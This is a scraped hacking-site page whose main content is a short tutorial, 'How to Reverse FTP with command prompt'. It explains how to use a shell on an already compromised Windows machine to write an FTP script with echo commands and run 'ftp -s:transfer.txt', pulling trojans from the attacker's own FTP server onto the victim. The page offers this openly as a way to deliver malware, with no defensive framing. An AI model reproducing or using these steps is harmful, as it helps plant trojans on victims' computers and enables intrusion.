Site menu |
|
 |
Our poll |
|
 |
Statistics |
Total online: 5 Guests: 5 Users: 0 |
 |
|
 | |  |
| How to Reverse FTP with command prompt
Wanna upload files to a remote computer? (trojans ect.)
well , reverse ftp'ing :
i explain it in few steps :
1 - configure a good ftp server on your pc and run it 2 - choice good username and password for your ftp server 3 - put all needed files to upload ( trojans ..etc ) on your ftp server local directory 4 - in hacked command shell enter the following commands :
echo off echo open 192.168.xxx.xxx>transfer.txt ;put your IP echo your-user-name>>transfer.txt ;for your ftp server echo your-password>>transfer.txt ;for your ftp server echo get file1.exe>>transfer.txt ; any file or trojan to upload echo get file2.exe>>transfer.txt ; any file or trojan to upload .... ; may be continued as needed .... ; may be continued as needed echo quit >>transfer.txt ; end of uploading transfer
ftp -s:transfer.txt ; ftp'ing script
| |
 | |  |
|
Sign in |
|
 |
Calendar |
« June 2023 » | Su | Mo | Tu | We | Th | Fr | Sa | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 |
|
 |
IP |
|
 |
|